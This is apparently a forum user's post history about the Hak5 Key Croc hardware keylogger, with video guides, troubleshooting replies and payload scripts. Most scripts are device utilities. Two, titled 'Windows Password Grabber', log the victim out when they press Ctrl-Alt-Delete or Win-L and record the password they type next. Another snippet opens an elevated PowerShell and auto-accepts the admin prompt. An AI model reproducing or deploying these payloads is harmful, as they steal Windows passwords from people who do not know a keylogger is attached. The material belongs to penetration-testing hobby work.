RootJunky

Everything posted by RootJunky

  1. RootJunky's Video Guides

     I have created a bunch of video tutorials for the Key Croc. These videos will hopefully help those of you on the forum that are having problems or just want to learn more about the devices. Hak5 official docs on the Croc are amazing but sometimes it's hard to translate them to real world use. I hope you guys enjoy these videos.

       • Introduction to the Key Croc Key Logger by Hak5
       • Key Croc key logger firmware restore and or Upgrade
       • How to Factory Reset the Key Croc Key Logger by Hak5
       • Key Croc WiFi Setup and SSH shell access
       • Key Croc intro to payloads and Nano editor
       • Key Croc Payload Windows Password Grabber and Num Lock error

     If there is something you guys would like to see covered in a video please comment below and I will see what I can do.

     Remember you can find the Official docs for the Key Croc here. https://docs.hak5.org/hc/en-us/categories/360003797793-Key-Croc

     Also the latest firmware here. https://downloads.hak5.org/croc

     RootJunky out.
  2. You got it right, but I myself have not fully tested this feature. Also, what firmware version are you on?
  3. QUACK LOCK is a now bug and doesn't work at this time.

         WAIT_FOR_KEYBOARD_INACTIVITY 10

     This command requires the interval at the end, like above, in seconds.
  4. Well, how's it going? Did that work? Also, just a note: the numlock has to be on on your keyboard for these and any payload to work correctly, if you didn't already know.
  5. I know how to edit the config file as seen here: https://github.com/rootjunky/keycroc-payloads/blob/master/library/examples/wifispot.txt That is not what I am asking. I want to know what these do.

     Framework helpers: https://docs.hak5.org/hc/en-us/articles/360048190473-Helpful-Payload-Snippets

     Run GET_HELPERS on your keycroc.
  6. I just want to know what they do. You can leave it up to me to figure out if I want to use them.
  7.
         MATCH back
         Q GUI r
         Q STRING powershell
         Q ENTER
         Q STRING Start-Process "powershell" -Verb RunAs
         Q ENTER
         Q DELAY 10000
         Q KEYCODE 00,00,50
         Q ENTER
         Q STRING \$Password = Read-Host -AsSecureString p4ssw0rd

     Here is my script that I added a couple changes to. I gave you the wrong escape before. It is the forward slash \ as you can see in the payload above. The \ escapes the $ which is run on the linux match as a bash command and now with the \ is ignored and types it to the powershell window instead. You will need the \ before every $ in your script.

     Q KEYCODE 00,00,50 is the left arrow button 🙂 auto admin permission.
  8. OK, I think I see your problem. You have to remember that the Keycroc is a linux device and some commands are seen as bash on that device when typed with Q STRING in your powershell window. You should try putting those commands that mess up inside of "" or (). Also, you can escape the linux bash with / in front of the part of the string that messes up. Good luck, let me know if that works for you.
  9. Please run my croc info script and give me the output. Also, can you link one of the scripts you are trying to run on the keycroc? Also, what does your config.txt file look like? Having these would be very helpful for troubleshooting. I will try and help if I can.
  10. I would love to have some more explanation of what these commands all do.

         ENABLE_WIFI
         ENABLE_INTERFACE
         START_WLAN_DHCP
         CLEAR_WIFI_CONFIG
         CONFIG_PSK_WIFI
         CONFIG_OPEN_WIFI

     I see that CLEAR_WIFI_CONFIG will rm /etc/wpa_supplicant.conf, but I can't seem to get any of the other commands in my payload to work. For example, ENABLE_WIFI 'SSID' 'PASSWORD' will not edit the /etc/wpa_supplicant.conf or the config.txt file, so I am not sure what these commands do. Maybe they are broken. Please help.
  11. This is a simple payload that is used to clear the log files stored in the KeyCroc. This gives you a clean slate to work with on a new machine and not have to look at all of the old key strokes. Great for development and testing.

         # Title: croc log clear
         # Description: crocclear = keycroc log files wipe
         # Author: Rootjunky
         # Version: 1.0
         # Category: Key Croc
         #
         MATCH crocclear
         QUACK LOCK
         echo > /root/loot/croc_char.log
         echo > /root/loot/croc_raw.log
         echo > /root/loot/matches.log
         QUACK BACKSPACE
         QUACK BACKSPACE
         QUACK BACKSPACE
         QUACK BACKSPACE
         QUACK BACKSPACE
         QUACK BACKSPACE
         QUACK BACKSPACE
         QUACK BACKSPACE
         QUACK BACKSPACE
         QUACK UNLOCK
         LED FINISH
         Q DELAY 2000
         LED OFF

     Developed by Rootjunky.

     croc-clear.txt
  12. Totally agree, this needs to be fixed in firmware version 1.4.
  13. Yes, you nailed it. When num lock is on I get 12 1 2 3. When num lock is off I get 12. Nothing, as you can see, but the enters.
  14. I just tested my Croc for number typing and it works just fine.

     Payload

         MATCH 12
         QUACK ENTER
         QUACK STRING "1"
         QUACK ENTER
         QUACK STRING "2"
         QUACK ENTER
         QUACK STRING "3"
         QUACK ENTER

     typed 12 1 2 3

     In fact, when I typed twelve above it auto ran the Payload and typed the 1 2 3.
  15. Something like this might work, but if you mess it up you might lose your SSH connection to the croc. https://computingforgeeks.com/create-wi-fi-hotspot-on-ubuntu-debian-fedora-centos-arch/
  16. Yes fneagle, that is a great idea but I don't know how to do that.
  17. For some reason QUACK GUI L wasn't working on my machine once control alt delete was matched but QUACK STRING GUI l works.
  18. Windows Password Grabber CAD

     This is a simple payload used to log out once Control Alt Delete is pressed on a Windows PC, then it will capture the next 15 buttons pressed. You can edit the script to your liking. The 15 buttons saved will be stored in your loot folder.

         # Title: Windows Password Grabber
         # Description: When Control Alt Delete is pressed it will log out the current user and request a password that will be captured and stored in loot.
         # Author: RootJunky
         # Version: 1.0
         # Category: Credentials
         #
         #
         MATCH \[CONTROL-ALT-DELETE\]
         LED ATTACK STAGE1
         QUACK STRING "GUI l"
         SAVEKEYS /root/loot/password.log NEXT 15
         QUACK DELAY 1000
         LED OFF

     https://github.com/rootjunky/keycroc-payloads/blob/master/library/examples/windows-password-grabber-ctrl-alt-delete.txt
  19. Windows Password Grabber GUI L

     This is a simple payload used to capture the next 15 buttons pressed once someone presses Windows button and L to log themselves out of a PC. You can edit the script to your liking. The 15 buttons saved will be stored in your loot folder.

         # Title: Windows Password Grabber GUI L
         # Description: When GUI L is pressed it will log out the current user and request a password that will be captured and stored in loot.
         # Author: RootJunky
         # Version: 1.0
         # Category: Credentials
         #
         #
         MATCH \[GUI-l]
         LED ATTACK STAGE1
         SAVEKEYS /root/loot/password-GUI-L.log NEXT 15
         QUACK DELAY 1000
         LED OFF

     Thanks, RootJunky

     windows-password-grabber-gui-l.txt
  20. Yes, I made this actually. I left password the same and just changed the SSID. Works pretty good. Great, look forward to the new firmware v1.3.

         # Title: ssid changer 1
         # Description: Change the ssid stored in the config file
         # Author: Rootjunky
         # Version: 1.0
         # Category: Key Croc
         #
         #
         MATCH changewifi
         QUACK LOCK
         QUACK ENTER
         QUACK STRING $(grep -rl "WIFI_SSID" /root/udisk/config.txt | xargs sed -i 's/WIFI_SSID 2WIRE111/WIFI_SSID KeyCroc/g')
         QUACK STRING "wifi ssid changed to KeyCroc"
         QUACK ENTER
         QUACK UNLOCK
  21. Yes, it's a Logitech K270 https://www.logitech.com/en-roeu/product/wireless-keyboard-k270 I have hardware to capture the keycodes but, like I said, I cannot get them to work from the keycroc.
  22. I did a little research into why my hot keys on my keyboard are not passing through the KeyCroc. Below are my keyboard scan codes that I captured, with the number 1 for comparison. I am guessing that the reason these buttons are not working is because they are not listed in the language US.json. I would love some help troubleshooting this problem and adding these hot keys and others to the KeyCroc. I tried to make a payload that would QUACK KEYCODE 03,CD,00 for example and match it with MATCH 1 but this will not play/pause for me. Thoughts?

         radix: hexadecimal 03 CD 00 00 00             play pause
         radix: hexadecimal 03 E2 00 00 00             mute unmute
         radix: hexadecimal 03 EA 00 00 00             volume down
         radix: hexadecimal 03 E9 00 00 00             volume up
         radix: hexadecimal 03 23 02 00 00             home
         radix: hexadecimal 03 8A 01 00 00             mail
         radix: hexadecimal 04 01                      power off / sleep screen
         radix: hexadecimal 03 92 01 00 00             cal
         radix: hexadecimal 00 00 1E 00 00 00 00 00    number 1
  23. Can you edit the config.txt file to be able to connect to multiple wifi SSIDs? I would like to be able to connect to a local wifi network and a mobile hotspot, not at the same time but to whichever one is in range.
  24. CrocSSH By RootJunky

     Key Croc SSH login is really simple to use and makes it easy to ssh into your Key Croc with one simple command into a terminal ( crocssh ). Once you enter the command the script will erase the crocssh in the terminal and enter everything including the IP into the terminal along with the default password and get you logged into the device over ssh. First login requires you to accept the secure id but after that this script will log you in without any problems. Suggestions welcome to improve this payload.

     Must type on target keyboard.

     Note: this payload is developed for Windows only and will not work on linux or OSX. Maybe Spywill can put together a Linux and mac OSX version for you guys.

     croc-ssh-payload.txt

         # Title: Key Croc ssh login
         # Description: Logs into key croc over ssh
         # Author: RootJunky
         # Version: 1.0
         # Category: Key Croc
         #
         #
         MATCH crocssh
         QUACK LOCK
         QUACK BACKSPACE
         QUACK BACKSPACE
         QUACK BACKSPACE
         QUACK BACKSPACE
         QUACK BACKSPACE
         QUACK BACKSPACE
         QUACK BACKSPACE
         QUACK STRING "ssh root@"
         QUACK STRING $(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)
         QUACK DELAY 1000
         QUACK ENTER
         QUACK DELAY 1000
         QUACK STRING "hak5croc"
         QUACK ENTER
         QUACK ENTER
         QUACK UNLOCK

     Version 2.0 will open powershell and login to the keycroc along with bring you to a live key log that you can view as people type on the keyboard. Big thanks to Spywill for his help on this update. 🙂

         # Title: Key Croc ssh login
         # Description: Logs into key croc over ssh
         # Author: RootJunky / Spywill
         # Version: 2.0
         # Category: Key Croc
         #
         #
         MATCH crocssh
         Q LOCK
         Q GUI r
         sleep 1
         Q STRING "powershell"
         Q ENTER
         sleep 2
         Q STRING "ssh root@"
         sleep 1
         Q STRING $(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)
         sleep 1
         Q ENTER
         sleep 1
         Q STRING "hak5croc"
         Q ENTER
         sleep 1
         Q STRING "cd loot"
         Q ENTER
         sleep 1
         # press control +c to exit
         Q STRING echo "press control + c to exit this live key log"
         Q ENTER
         Q ENTER
         Q STRING "tail -f croc_char.log"
         Q ENTER
         Q UNLOCK
         LED FINISH

     Big thanks to Hak5 for this awesome and fun Key Croc.

     Developed by RootJunky / Spywill

     croc-ssh-2.0.txt croc-ssh1.0.txt
  25. CrocInfo by RootJunky

     Croc info grabber is a simple script to be able to grab a bunch of info about your Key Croc with a simple command ( crocinfo ). This payload is best used for development when you only have one pc to develop and test on. This payload will return Key Croc Firmware, IP, DNS, User, Password, Hostname, SSH, and current Attack Mode.

     Place file in payloads folder and type crocinfo on target keyboard in a notepad to display crocinfo.

     croc-info-payload.txt

         # Title: Key Croc Info Grabber
         # Description: Returns Info on the Key Croc
         # Author: RootJunky
         # Version: 1.0
         # Category: Key Croc
         #
         #
         MATCH crocinfo
         QUACK LOCK
         QUACK ENTER
         QUACK ENTER
         QUACK STRING "CROC FIRMWARE: "
         QUACK STRING $(cat /root/udisk/version.txt)
         QUACK ENTER
         QUACK ENTER
         QUACK STRING "IP: "
         QUACK STRING $(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)
         QUACK ENTER
         QUACK STRING "DNS: "
         QUACK STRING $(sed -n -e 4p /etc/resolv.conf)
         QUACK ENTER
         QUACK STRING "DNS: "
         QUACK STRING $(sed -n -e 5p /etc/resolv.conf)
         QUACK ENTER
         QUACK ENTER
         QUACK STRING "USER: "
         QUACK STRING $(whoami)
         QUACK ENTER
         QUACK ENTER
         QUACK STRING "PASSWORD: "
         QUACK STRING "hak5croc"
         QUACK ENTER
         QUACK ENTER
         QUACK STRING "HOSTNAME: "
         QUACK STRING $(cat /proc/sys/kernel/hostname)
         QUACK ENTER
         QUACK ENTER
         QUACK STRING "SSH: "
         QUACK STRING "ssh root@"
         QUACK STRING $(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)
         QUACK ENTER
         QUACK ENTER
         QUACK STRING "MODE: "
         QUACK STRING $(cat /tmp/mode)
         QUACK ENTER
         QUACK ENTER
         QUACK UNLOCK
         #Default Settings
         #username: root
         #password: hak5croc
         #hostname: croc

     My Results

         crocinfo

         CROC FIRMWARE:1.2_475

         IP:192.168.1.36
         DNS:nameserver 1.1.1.1
         DNS:nameserver 8.8.8.8

         USER:root

         PASSWORD:hak5croc

         HOSTNAME:croc

         SSH:ssh root@192.168.1.36

         MODE:HID VID_0X046D PID_0XC52B

     Big thanks to Hak5 for this awesome and fun Key Croc.

     Developed by RootJunky